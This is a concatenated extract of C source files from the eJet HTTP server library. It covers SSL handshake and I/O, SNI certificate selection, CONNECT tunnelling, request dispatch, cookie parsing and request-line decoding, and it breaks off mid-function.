SSL_set_fd(ssl, iodev_fd(pdev));
if (iodev_fdtype(pdev) == FDT_ACCEPTED) {
SSL_set_accept_state(ssl);
} else if (iodev_fdtype(pdev) == FDT_CONNECTED) {
SSL_set_connect_state(ssl);
}
if (SSL_set_ex_data(ssl, ssl_conn_index, (void *)pcon) == 0) {
tolog(1, "eJet - SSL: SSL_set_ex_data() failed");
}
return ssl;
}
int http_ssl_free (SSL * ssl)
{
if (!ssl) return -1;
SSL_shutdown(ssl);
SSL_free(ssl);
return 0;
}
void * http_con_from_ssl (SSL * ssl)
{
if (!ssl) return NULL;
return SSL_get_ex_data(ssl, ssl_conn_index);
}
/* Before the SSL handshake completes, the client sends a 'Client Hello' carrying the
   requested server name to the web server. That server name is delivered to this
   callback so the appropriate certificate and private key can be selected. This is
   the SNI mechanism of the TLS spec: multiple certificates can serve different host
   names on a single listening port. */
int http_ssl_servername_select (SSL * ssl, int * ad, void * arg)
{
HTTPCon * pcon = NULL;
HTTPListen * hl = NULL;
HTTPHost * host = NULL;
char * servername = NULL;
SSL_CTX * sslctx = NULL;
if (!ssl) return SSL_TLSEXT_ERR_NOACK;
servername = (char *)SSL_get_servername(ssl, TLSEXT_NAMETYPE_host_name);
if (!servername)
return SSL_TLSEXT_ERR_NOACK;
pcon = SSL_get_ex_data(ssl, ssl_conn_index);
if (!pcon)
return SSL_TLSEXT_ERR_NOACK;
if (!pcon->ssl_link || pcon->ssl_handshaked)
return SSL_TLSEXT_ERR_NOACK;
hl = (HTTPListen *)pcon->hl;
if (!hl)
return SSL_TLSEXT_ERR_NOACK;
host = http_listen_host_get(hl, servername);
if (!host)
return SSL_TLSEXT_ERR_NOACK;
if (host->sslctx == NULL)
return SSL_TLSEXT_ERR_NOACK;
sslctx = (SSL_CTX *)host->sslctx;
SSL_set_SSL_CTX(ssl, sslctx);
SSL_set_verify(ssl, SSL_CTX_get_verify_mode(sslctx),
SSL_CTX_get_verify_callback(sslctx));
SSL_set_verify_depth(ssl, SSL_CTX_get_verify_depth(sslctx));
#if OPENSSL_VERSION_NUMBER >= 0x009080dfL
/* only in 0.9.8m+ */
SSL_clear_options(ssl, SSL_get_options(ssl) & ~SSL_CTX_get_options(sslctx));
#endif
SSL_set_options(ssl, SSL_CTX_get_options(sslctx));
#ifdef SSL_OP_NO_RENEGOTIATION
SSL_set_options(ssl, SSL_OP_NO_RENEGOTIATION);
#endif
tolog(1, "eJet - SSL select server name %s successfully\n", servername);
return SSL_TLSEXT_ERR_OK;
}
#endif
int http_ssl_accept (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
#ifdef HAVE_OPENSSL
int acret = 0;
int ret;
if (!pcon) return -1;
if (!pcon->ssl_link || !pcon->ssl)
return http_cli_recv(pcon);
if (pcon->ssl_handshaked) {
return http_cli_recv(pcon);
}
time(&pcon->stamp);
acret = SSL_accept(pcon->ssl);
if (acret == 1) {
pcon->ssl_handshaked = 1;
if (pcon->rcv_state == HTTP_CON_SSL_HANDSHAKING)
pcon->rcv_state = HTTP_CON_READY;
tolog(1, "eJet - SSL accept %s:%d successfully. Using cipher: %s\n",
pcon->srcip, pcon->srcport, SSL_get_cipher(pcon->ssl));
return http_cli_recv(pcon);
}
ret = SSL_get_error(pcon->ssl, acret);
switch (ret) {
case SSL_ERROR_WANT_READ:
/* waiting clifd READ event */
return 0;
case SSL_ERROR_WANT_WRITE:
iodev_add_notify(pcon->pdev, RWF_WRITE);
/* waiting clifd WRITE event */
return 0;
case SSL_ERROR_SSL:
case SSL_ERROR_SYSCALL:
default:
tolog(1, "eJet - SSL accept %s:%d but handshake failed!\n", pcon->srcip, pcon->srcport);
http_con_close(pcon);
break;
}
return 0;
#else
return http_cli_recv(pcon);
#endif
}
int http_ssl_connect (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
#ifdef HAVE_OPENSSL
int conret = 0;
int ret;
if (!pcon) return -1;
if (!pcon->ssl_link || !pcon->ssl)
return http_srv_send(pcon);
if (pcon->ssl_handshaked) {
return http_srv_send(pcon);
}
time(&pcon->stamp);
conret = SSL_connect(pcon->ssl);
if (conret == 1) {
pcon->ssl_handshaked = 1;
if (pcon->snd_state == HTTP_CON_SSL_HANDSHAKING)
pcon->snd_state = HTTP_CON_SEND_READY;
tolog(1, "eJet - SSL connect %s:%d successfully! Using cipher: %s\n",
pcon->dstip, pcon->dstport, SSL_get_cipher(pcon->ssl));
return http_srv_send(pcon);
}
ret = SSL_get_error(pcon->ssl, conret);
switch (ret) {
case SSL_ERROR_WANT_READ:
/* waiting srvfd READ event */
return 0;
case SSL_ERROR_WANT_WRITE:
iodev_add_notify(pcon->pdev, RWF_WRITE);
/* waiting srvfd WRITE event */
return 0;
case SSL_ERROR_SSL:
case SSL_ERROR_SYSCALL:
default:
tolog(1, "eJet - SSL connect %s:%d but handshake failed!\n", pcon->srcip, pcon->srcport);
http_con_close(pcon);
break;
}
return 0;
#else
return http_srv_send(pcon);
#endif
}
int http_con_read (void * vcon, frame_p frm, int * num, int * err)
{
HTTPCon * pcon = (HTTPCon *)vcon;
#ifdef HAVE_OPENSSL
uint8 buf[524288];
int size = sizeof(buf);
int ret = 0, readLen = 0;
int sslerr = 0;
#endif
if (!pcon) return -1;
#ifdef HAVE_OPENSSL
if (!pcon->ssl_link)
return frame_tcp_nbzc_recv(pcon->rcvstream, iodev_fd(pcon->pdev), num, err);
if (!pcon->ssl) return -2;
for (readLen = 0; ;) {
ret = SSL_read(pcon->ssl, buf, size);
if (ret > 0) {
readLen += ret;
if (frm) frame_put_nlast(frm, buf, ret);
continue;
}
sslerr = SSL_get_error(pcon->ssl, ret);
if (num) *num = readLen;
if (ret == 0) {
if (sslerr == SSL_ERROR_ZERO_RETURN) {
if (err) *err = EBADF;
return -20;
} else {
if (err) *err = EBADF;
return -30;
}
} else { //ret < 0
if (sslerr == SSL_ERROR_WANT_READ) {
if (err) *err = EAGAIN;
break;
} else if (sslerr == SSL_ERROR_WANT_WRITE) {
iodev_add_notify(pcon->pdev, RWF_WRITE);
if (err) *err = EAGAIN;
break;
} else if (sslerr == SSL_ERROR_SSL) {
if (err) *err = EPROTO;
} else if (sslerr == SSL_ERROR_SYSCALL) {
if (err) *err = errno;
if (errno == EAGAIN || errno == EWOULDBLOCK)
break;
} else {
if (err) *err = EINVAL;
}
return -30;
}
}
if (num) *num = readLen;
return readLen;
#else
return frame_tcp_nbzc_recv(pcon->rcvstream, iodev_fd(pcon->pdev), num, err);
#endif
}
int http_con_writev (void * vcon, void * piov, int iovcnt, int * num, int * err)
{
HTTPCon * pcon = (HTTPCon *)vcon;
#ifdef HAVE_OPENSSL
struct iovec * iov = (struct iovec *)piov;
void * pbyte;
int bytelen;
int wbytes;
int wlen = 0;
int i;
int ret = 0;
int sslerr = 0;
#endif
if (num) *num = 0;
if (err) *err = 0;
if (!pcon) return -1;
#ifdef HAVE_OPENSSL
if (!iov || iovcnt <= 0) return 0;
if (!pcon->ssl_link)
return tcp_writev(iodev_fd(pcon->pdev), piov, iovcnt, num, err);
if (!pcon->ssl) return -2;
for (i = 0; i < iovcnt; i++) {
pbyte = iov[i].iov_base;
bytelen = iov[i].iov_len;
for (wbytes = 0; wbytes < bytelen; ) {
ret = SSL_write(pcon->ssl, pbyte + wbytes, bytelen - wbytes);
if (ret > 0) {
wbytes += ret;
wlen += ret;
continue;
}
sslerr = SSL_get_error(pcon->ssl, ret);
if (num) *num = wlen;
if (ret == 0) {
if (sslerr == SSL_ERROR_ZERO_RETURN) {
if (err) *err = EBADF;
return -20;
} else {
if (err) *err = EBADF;
return -30;
}
} else { //ret < 0
if (sslerr == SSL_ERROR_WANT_READ) {
if (err) *err = EAGAIN;
return wlen;
} else if (sslerr == SSL_ERROR_WANT_WRITE) {
iodev_add_notify(pcon->pdev, RWF_WRITE);
if (err) *err = EAGAIN;
return wlen;
} else if (sslerr == SSL_ERROR_SSL) {
if (err) *err = EPROTO;
} else if (sslerr == SSL_ERROR_SYSCALL) {
if (err) *err = errno;
if (errno == EAGAIN || errno == EWOULDBLOCK) {
iodev_add_notify(pcon->pdev, RWF_WRITE);
return wlen;
}
} else {
if (err) *err = EINVAL;
}
return -30;
}
} //end for (wbytes = 0; wbytes < bytelen; )
}
if (num) *num = wlen;
return wlen;
#else
return tcp_writev(iodev_fd(pcon->pdev), piov, iovcnt, num, err);
#endif
}
int http_con_sendfile (void * vcon, int filefd, int64 pos, int64 size, int * num, int * err)
{
HTTPCon * pcon = (HTTPCon *)vcon;
#ifdef HAVE_OPENSSL
static int mmapsize = 8192 * 1024;
void * pbyte = NULL;
void * pmap = NULL;
int64 maplen = 0;
#if defined(_WIN32) || defined(_WIN64)
HANDLE hmap;
int64 mapoff = 0;
#endif
size_t onelen = 0;
int64 wlen = 0;
int wbytes = 0;
int ret = 0;
int sslerr = 0;
#endif
if (num) *num = 0;
if (err) *err = 0;
if (!pcon) return -1;
if (filefd < 0) return -2;
#ifdef HAVE_OPENSSL
if (!pcon->ssl_link)
return tcp_sendfile(iodev_fd(pcon->pdev), filefd, pos, size, num, err);
if (!pcon->ssl) return -2;
for (wlen = 0; pos + wlen < size; ) {
onelen = size - wlen;
if (onelen > mmapsize) onelen = mmapsize;
#ifdef UNIX
pbyte = file_mmap(NULL, filefd, pos + wlen, onelen, PROT_READ, MAP_PRIVATE, &pmap, &maplen, NULL);
#elif defined(_WIN32) || defined(_WIN64)
pbyte = file_mmap(NULL, (HANDLE)filefd, pos + wlen, onelen, NULL, &hmap, &pmap, &maplen, &mapoff);
#endif
if (!pbyte) break;
for (wbytes = 0; wbytes < onelen; ) {
ret = SSL_write(pcon->ssl, pbyte + wbytes, onelen - wbytes);
if (ret > 0) {
wbytes += ret;
wlen += ret;
continue;
}
munmap(pmap, maplen);
if (num) *num = wlen;
sslerr = SSL_get_error(pcon->ssl, ret);
if (ret == 0) {
if (sslerr == SSL_ERROR_ZERO_RETURN) {
if (err) *err = EBADF;
return -20;
} else {
if (err) *err = EBADF;
return -30;
}
} else { //ret < 0
if (sslerr == SSL_ERROR_WANT_READ) {
if (err) *err = EAGAIN;
return wlen;
} else if (sslerr == SSL_ERROR_WANT_WRITE) {
iodev_add_notify(pcon->pdev, RWF_WRITE);
if (err) *err = EAGAIN;
return wlen;
} else if (sslerr == SSL_ERROR_SSL) {
if (err) *err = EPROTO;
} else if (sslerr == SSL_ERROR_SYSCALL) {
if (err) *err = errno;
if (errno == EAGAIN || errno == EWOULDBLOCK) {
iodev_add_notify(pcon->pdev, RWF_WRITE);
return wlen;
}
} else {
if (err) *err = EINVAL;
}
return -30;
}
} //end for (wbytes = 0; wbytes < onelen; )
munmap(pmap, maplen);
}
if (num) *num = wlen;
return wlen;
#else
return tcp_sendfile(iodev_fd(pcon->pdev), filefd, pos, size, num, err);
#endif
}
<|start_filename|>src/http_handle.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include <signal.h>
#include "http_header.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_con.h"
#include "http_request.h"
#include "http_cgi.h"
#include "http_listen.h"
#include "http_form.h"
#include "http_proxy.h"
#include "http_cache.h"
#include "http_handle.h"
int http_msg_handle (void * vcon, void * vmsg)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = (HTTPMsg *)vmsg;
int ret = 0;
if (!pcon) return -1;
if (!msg) return -2;
if (msg->issued) return 0;
msg->state = HTTP_MSG_REQUEST_HANDLING;
switch (msg->req_methind) {
case HTTP_METHOD_CONNECT:
return http_connect_process(pcon, msg);
case HTTP_METHOD_DELETE:
case HTTP_METHOD_GET:
case HTTP_METHOD_HEAD:
case HTTP_METHOD_OPTIONS:
case HTTP_METHOD_POST:
case HTTP_METHOD_PUT:
case HTTP_METHOD_TRACE:
return http_request_process(pcon, msg);
default:
msg->SetStatus(msg, 405, NULL);
ret = msg->Reply(msg);
return ret;
}
return 1;
}
int http_tunnel_dns_resolve_cb (void * vmsg, char * name, int len, void * cache, int status)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPCon * pcon = NULL;
HTTPCon * tunnelcon = NULL;
if (!msg) return -1;
pcon = (HTTPCon *)msg->pcon;
if (!pcon) return -2;
if (status == DNS_ERR_IPV4 || status == DNS_ERR_IPV6) {
str_secpy(msg->dstip, sizeof(msg->dstip)-1, name, len);
} else if (dns_cache_getip(cache, 0, msg->dstip, sizeof(msg->dstip)-1) <= 0) {
msg->SetStatus(msg, 400, NULL);
return msg->Reply(msg);
}
msg->dstport = msg->req_port;
tunnelcon = http_proxy_connect_tunnel(pcon, msg);
if (tunnelcon == NULL && pcon->tunnelself == 0) {
msg->SetStatus(msg, 406, NULL);
return msg->Reply(msg);
}
msg->SetStatus(msg, 200, "Connection Established");
return msg->Reply(msg);
}
int http_connect_process (void * vcon, void * vmsg)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HTTPListen * hl = NULL;
if (!pcon) return -1;
if (!msg) return -2;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -3;
hl = (HTTPListen *)pcon->hl;
if (!hl) return -4;
/* if the configuration of the current HTTP Listen does not allow forward proxy */
if (hl->forwardproxy == 0) {
/* the CONNECT method relies on the proxy mechanism */
msg->SetStatus(msg, 403, "Proxy is Forbidden");
return msg->Reply(msg);
}
/* system configuration does not allow CONNECT tunnel */
if (mgmt->proxy_tunnel == 0) {
msg->SetStatus(msg, 405, "CONNECT method not allowed");
return msg->Reply(msg);
}
if (dns_query(mgmt->pcore, msg->req_host, msg->req_hostlen,
http_tunnel_dns_resolve_cb, msg) < 0)
{
msg->SetStatus(msg, 400, NULL);
return msg->Reply(msg);
}
return 0;
}
int http_request_process (void * vcon, void * vmsg)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPListen * hl = NULL;
HTTPLoc * ploc = NULL;
HTTPMgmt * mgmt = NULL;
CacheInfo * cacinfo = NULL;
char path[1024];
int i, fret, ret = -100;
if (!pcon) return -1;
if (!msg) return -2;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -3;
hl = (HTTPListen *)pcon->hl;
if (!hl) return -4;
if (msg->cacheon && msg->res_file_cache >= 3) {
cacinfo = msg->res_cache_info;
if (msg->res_file_cache == 3) {
ret = msg->AddResFile(msg, msg->res_file_name, 0, -1);
} else if (cacinfo != NULL) {
ret = msg->AddResFile(msg, cacinfo->cache_tmp, 0, -1);
} else ret = -100;
if (ret < 0)
msg->SetStatus(msg, 404, NULL);
else
msg->SetStatus(msg, 200, NULL);
if (cacinfo && ret >= 0) {
http_cache_response_header(msg, cacinfo);
msg->SetResContentTypeID(msg, cacinfo->mimeid);
}
return msg->Reply(msg);
}
/* if the configuration of the current HTTP Listen does not allow forward proxy */
if (msg->req_url_type > 0 && hl->forwardproxy == 0) {
msg->SetStatus(msg, 403, "Proxy is Forbidden");
return msg->Reply(msg);
}
/* if the request is an absolute URI and the Location instance is NULL,
   re-instantiation is performed. */
if (msg->req_url_type > 0 && msg->ploc == NULL) {
http_req_set_docuri(msg, frameP(msg->uri->uri), frameL(msg->uri->uri), 0, 0);
}
ploc = (HTTPLoc *)msg->ploc;
fret = msg->GetRealFile(msg, path, sizeof(path) - 1);
#ifdef _DEBUG
printf("####Path: %s\n", path);
#endif
if (msg->issued <= 0 && ploc && (ploc->type & SERV_CALLBACK) && ploc->cbfunc) {
msg->cbobj = ploc->cbobj;
ret = (*ploc->cbfunc)(ploc->cbobj, msg, ploc->tplfile ? ploc->tplfile : path);
}
if (msg->issued <= 0 && hl->cbfunc) {
msg->cbobj = hl->cbobj;
ret = (*hl->cbfunc)(hl->cbobj, msg, path);
}
if (msg->issued <= 0 && mgmt->req_handler) {
msg->cbobj = mgmt->req_cbobj;
ret = (*mgmt->req_handler)(mgmt->req_cbobj, msg, path);
}
/* if an upper callback handled and replied to the request, the msg has already been recycled.
 * otherwise, some default handling is done here, depending on whether the msg was dealt with correctly */
if (ret < 0 && msg->issued <= 0) {
if (!(ploc = (HTTPLoc *)msg->ploc)) {
msg->SetStatus(msg, 404, NULL);
return msg->Reply(msg);
}
if (strstr(path, "../")) {
msg->SetStatus(msg, 404, NULL);
return msg->Reply(msg);
}
if (fret > 0 && file_is_regular(path)) {
if (msg->AddResFile(msg, path, 0, -1) < 0)
msg->SetStatus(msg, 404, NULL);
else
msg->SetStatus(msg, 200, NULL);
return msg->Reply(msg);
} else if (file_is_dir(path)) {
ret = strlen(path);
for (i = 0; i < (int)ploc->indexnum; i++) {
sprintf(path + ret, "%s", ploc->index[i]);
if (file_is_regular(path)) {
if (msg->AddResFile(msg, path, 0, -1) < 0)
msg->SetStatus(msg, 404, NULL);
else
msg->SetStatus(msg, 200, NULL);
return msg->Reply(msg);
}
}
/* read the current directory to build the reply.
   Caution: uncommenting the following lines is dangerous, since it
   exposes the file system. Watch your step! */
/*ret = msg->DisplayDirectory(msg);
if (ret >= 0) return 0;*/
}
msg->SetStatus(msg, 404, NULL);
return msg->Reply(msg);
}
return ret;
}
<|start_filename|>include/http_srv_io.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_SRV_IO_H_
#define _HTTP_SRV_IO_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_srv_send_probe (void * vcon);
int http_srv_send (void * vcon);
int http_srv_send_final (void * vmsg);
int http_srv_recv (void * vcon);
int http_srv_recv_parse (void * vcon);
int http_srv_resbody_parse (void * vcon, void * vmsg, int64 * offset, int64 * savedbytes);
int http_srv_con_lifecheck (void * vcon);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_script.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_SCRIPT_H_
#define _HTTP_SCRIPT_H_
#ifdef __cplusplus
extern "C" {
#endif
typedef struct http_script_s {
void * msg;
char * script;
int scriptlen;
/* 0-unknown 1-HTTPListen script 2-Host script 3-Location script */
uint8 sctype : 4;
uint8 replied : 1;
uint8 exitflag : 1;
uint8 reloc : 1;
uint8 alloc : 1;
char * retval;
int retvallen;
char * vname;
int vtype;
} http_script_t, HTTPScript;
void * http_script_alloc ();
int http_script_init (void * vhsc, void * vmsg, char * psc, int sclen, uint8 sctype, char * vname, int vtype);
void http_script_free (void * vhsc);
int http_script_parse_exec (void * vhsc, char * sc, int sclen);
int http_script_segment_exec (void * vmsg, char * psc, int sclen, char ** pval,
int * vallen, char * vname, int vtype);
int http_script_exec (void * vmsg);
int http_reply_script_exec (void * vmsg);
void script_parser_init ();
void script_parser_clean ();
void * script_parser_get (char * cmd, int len);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_request.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_header.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_con.h"
#include "http_request.h"
#include "http_cookie.h"
#include "http_sndpxy.h"
#include "http_listen.h"
#include "http_cgi.h"
/* Cookie management: parse, add, del, get */
int http_req_addcookie (void * vmsg, char * name, int namelen,
char * value, int valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * punit = NULL;
HeaderUnit * phu = NULL;
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
if (value && valuelen < 0) valuelen = strlen(value);
mgmt = msg->httpmgmt;
punit = hunit_get (msg->req_cookie_table, name, namelen);
while (punit) {
phu = punit; punit = punit->next;
if (phu->valuelen == valuelen &&
strncasecmp(HUValue(phu), value, valuelen) ==0)
{
return 0;
}
}
punit = bpool_fetch(mgmt->header_unit_pool);
if (!punit) { return -5; }
punit->frame = msg->req_header_stream;
punit->name = name;
punit->namepos = HUPos(punit->frame, name);
punit->namelen = namelen;
punit->value = value;
punit->valuepos = HUPos(punit->frame, value);
punit->valuelen = valuelen;
punit->next = NULL;
if (!phu)
hunit_add(msg->req_cookie_table, name, namelen, punit);
else
phu->next = punit;
return 0;
}
int http_req_delallcookie (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * unit = NULL;
HeaderUnit * uiter = NULL;
int i, num;
if (!msg) return -1;
mgmt = msg->httpmgmt;
num = ht_num(msg->req_cookie_table);
for (i=0; i<num; i++) {
uiter = ht_value(msg->req_cookie_table, i);
while (uiter != NULL) {
unit = uiter; uiter = uiter->next;
bpool_recycle(mgmt->header_unit_pool, unit);
}
}
ht_zero(msg->req_cookie_table);
return 0;
}
HeaderUnit * http_req_getcookie (void * vmsg, char * name, int namelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * punit = NULL;
if (!msg) return NULL;
if (!name) return NULL;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return NULL;
punit = hunit_get (msg->req_cookie_table, name, namelen);
while (punit && punit->next) punit = punit->next;
return punit;
}
int http_req_parse_cookie (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * unit = NULL;
int nlen, vlen;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pn = NULL;
char * pv = NULL;
if (!msg) return -1;
unit = http_header_get(msg, 0, "Cookie", -1);
if (!unit) return -100;
if (unit->valuelen <= 0) return -101;
msg->req_cookie = HUValue(unit);
msg->req_cookie_len = unit->valuelen;
pbgn = HUValue(unit);
pend = pbgn + unit->valuelen;
while (pbgn < pend) {
pbgn = skipOver(pbgn, pend-pbgn, " \t;", 3);
if (pbgn >= pend) return -110;
pn = pbgn;
pbgn = skipTo(pbgn, pend-pbgn, ";", 1);
poct = skipTo(pn, pbgn-pn, "=", 1);
if (!poct || poct >= pbgn) continue;
pv = poct + 1;
poct = rskipOver(poct-1, poct-pn, " \t", 2);
if (poct < pn) continue;
nlen = poct - pn + 1;
vlen = pbgn - pv;
http_req_addcookie(msg, pn, nlen, pv, vlen);
}
return 0;
}
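/* A worked sketch of the loop above: a request header
       Cookie: uid=alice; theme=dark
   produces two entries in msg->req_cookie_table, ("uid","alice") and ("theme","dark").
   Names and values point into the header frame rather than being copied.
   (The cookie names and values here are illustrative.) */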
/* Request-Line = Method SP Request-URI SP HTTP-Version CRLF
*/
int http_req_reqline_decode (void * vmsg, char * pline, int linelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char * pval = NULL;
char * pend = NULL;
char * poct = NULL;
if (!msg) return -1;
if (!pline || linelen <= 0) return -2;
msg->req_line = pline;
msg->req_line_len = linelen - 1;
poct = pline; pend = pline + linelen;
/* parse for the field Request-Method */
pval = skipOver(poct, pend-poct, " \t\r\n;,", 6);
if (pval >= pend) return -100;
poct = skipTo(pval, pend-pval, " \t\r", 3);
http_req_set_reqmeth(msg, pval, poct-pval);
/* parse for the field Request-URI */
pval = skipOver(poct, pend-poct, " \t\r\n", 4);
if (pval >= pend) return -200;
poct = skipTo(pval, pend-pval, " \t\r", 3);
if (msg->req_methind == HTTP_METHOD_CONNECT) { //CONNECT method
/* A CONNECT method requests that a proxy establish a tunnel connection
on its behalf. The Request-URI portion of the Request-Line is always
an 'authority' as defined by URI Generic Syntax [2], which is to say
the host name and port number destination of the requested connection
separated by a colon:
CONNECT server.example.com:80 HTTP/1.1
Host: server.example.com:80
https://www.ietf.org/rfc/rfc2817 */
http_req_set_uri(msg, pval, poct-pval, 0);
} else {
if (http_req_set_uri(msg, pval, poct-pval, 0) > 0)
msg->req_url_type = 1;
}
/* parse for the field Request HTTP Version */
pval = skipOver(poct, pend-poct, " \t\r\n", 4);
if (pval >= pend) return -100;
poct = skipTo(pval, pend-pval, " \t\r", 3);
str_secpy(msg->req_ver, sizeof(msg->req_ver)-1, pval, poct-pval);
pval = skipTo(pval, poct-pval, "/", 1);
if (pval < poct) {
pval += 1;
msg->req_ver_major = str_to_int(pval, poct-pval, 10, (void **)&pval);
pval = skipOver(pval, poct-pval, ". \t", 3);
if (pval < poct)
msg->req_ver_minor = str_to_int(pval, poct-pval, 10, (void **)&pval);
}
return 0;
}
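/* A worked sketch of the decoding above (the request line is illustrative):
       GET /index.html?q=1 HTTP/1.1
   yields req_meth "GET" (req_methind = HTTP_METHOD_GET), the Request-URI
   "/index.html?q=1" passed to http_req_set_uri(), req_ver "HTTP/1.1",
   req_ver_major 1 and req_ver_minor 1. */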
int http_req_reqline_encode (char * meth, int methlen, char * uri,
int urilen, char * ver, int verlen, frame_p frame)
{
if (!meth || methlen <= 0) return -2;
if (!uri || urilen <= 0) return -3;
if (!ver || verlen <= 0) return -4;
if (!frame) return -5;
frame_put_nlast(frame, meth, methlen);
frame_put_nlast(frame, " ", 2);
frame_put_nlast(frame, uri, urilen);
frame_put_nlast(frame, " ", 2);
frame_put_nlast(frame, ver, verlen);
frame_put_nlast(frame, "\r\n", 2);
return 0;
}
static char * g_http_req_meth[] = {
"-NONE-",
"CONNECT",
"DELETE",
"GET",
"HEAD",
"HTTP/1.0",
"HTTP/1.1",
"OPTIONS",
"POST",
"PUT",
"TRACE",
NULL
};
static int g_http_req_meth_num = sizeof(g_http_req_meth)/sizeof(char *) - 1;
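/* NOTE: g_http_req_meth[] must stay sorted in case-insensitive ascending order,
   because http_meth_index() below performs a binary search over it with strcasecmp();
   adding a new token out of order would break the lookup. */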
int http_meth_index (char * meth)
{
int hi, mid, lo;
int ret = 0;
if (!meth || strlen(meth) <= 0) return 0;
hi = g_http_req_meth_num - 1;
lo = -1;
while (hi-lo > 1) {
mid = (hi + lo)/2;
ret = strcasecmp((char *)meth, g_http_req_meth[mid]);
if (ret < 0) hi = mid;
else if (ret > 0) lo = mid;
else return mid;
}
if (strcasecmp((char*)meth, g_http_req_meth[hi]) == 0) {
return hi;
}
return 0;
}
int http_req_set_reqmeth(void * vmsg, char * meth, int methlen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
int len = 0;
if (!msg) return -1;
if (!meth) return -2;
if (methlen < 0) len = strlen(meth);
else len = methlen;
if (len <= 0) return -3;
if (len > sizeof(msg->req_meth)-1)
len = sizeof(msg->req_meth)-1;
memcpy(msg->req_meth, meth, len);
msg->req_meth[len] = '\0';
msg->req_methind = http_meth_index(msg->req_meth);
return 0;
}
/* When acting as an HTTP server (not an HTTP proxy), the request line from the
 * client contains only the path and query, with no scheme or host.
 * To form a full URL, the value of the "Host" header is prepended to the requested URI.
 */
int http_req_set_absuri (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * punit = NULL;
int ret = 0;
if (!msg) return -1;
if (msg->req_methind == HTTP_METHOD_CONNECT) return 0;
http_uri_init(msg->absuri);
punit = http_header_get(msg, 0, "Host", 4);
if (punit) {
if (msg->ssl_link) {
frame_append(msg->absuri->uri, "https://");
} else {
frame_append(msg->absuri->uri, "http://");
}
frame_put_nlast(msg->absuri->uri, HUValue(punit), punit->valuelen);
}
if (msg->req_path && msg->req_pathlen > 0) {
frame_put_nlast(msg->absuri->uri, msg->req_path, msg->req_pathlen);
} else {
frame_put_last(msg->absuri->uri, '/');
}
if (msg->req_query && msg->req_querylen > 0) {
frame_append(msg->absuri->uri, "?");
frame_put_nlast(msg->absuri->uri, msg->req_query, msg->req_querylen);
}
ret = http_uri_parse(msg->absuri);
if (ret >= 0) {
msg->req_scheme = msg->absuri->scheme;
msg->req_schemelen = msg->absuri->schemelen;
msg->req_host = msg->absuri->host;
msg->req_hostlen = msg->absuri->hostlen;
msg->req_port = msg->absuri->port;
if (msg->req_port <= 0) {
if (msg->ssl_link)
msg->req_port = 443;
else
msg->req_port = 80;
}
}
return ret;
}
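/* Illustrative example (sketch): with a request header "Host: www.example.com:8080",
   req_path "/a/b" and req_query "x=1" over a plain (non-SSL) connection, the code
   above builds msg->absuri->uri = "http://www.example.com:8080/a/b?x=1" and, after
   http_uri_parse(), fills req_scheme/req_host/req_port from it; when the Host value
   carries no port, req_port falls back to 80 (or 443 on an SSL link). */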
int http_req_set_docuri (void * vmsg, char * puri, int urilen, int decode, int instbrk)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
int ret = 0;
HTTPLoc * ploc = NULL;
char udoc[8192];
if (!msg) return -1;
/* new DocURI is completely same as original one, just return */
if (frameL(msg->docuri->uri) == urilen &&
strncasecmp(frameS(msg->docuri->uri), puri, urilen) == 0)
return 0;
ret = http_uri_set(msg->docuri, puri, urilen, decode);
if (ret < 0) return ret;
msg->req_path = msg->docuri->path;
msg->req_pathlen = msg->docuri->pathlen;
msg->req_query = msg->docuri->query;
msg->req_querylen = msg->docuri->querylen;
if (msg->uri->type > 0) {
msg->ssl_link = msg->docuri->ssl_link;
msg->req_scheme = msg->docuri->scheme;
msg->req_schemelen = msg->docuri->schemelen;
msg->req_host = msg->docuri->host;
msg->req_hostlen = msg->docuri->hostlen;
msg->req_port = msg->docuri->port;
}
if (instbrk) return 0;
http_loc_instance(msg);
    /* if the real file of the request, after location instantiation, is a directory,
       check whether one of its index files exists. if so, set a new doc-uri */
if (msg->req_methind != HTTP_METHOD_GET)
return 0; //only GET supported for directory request
ploc = (HTTPLoc *)msg->ploc;
if (!ploc) return -201;
if ((ploc->type & SERV_PROXY) || (ploc->type & SERV_FASTCGI))
return 0;
    /* only a directory request needs its index file appended */
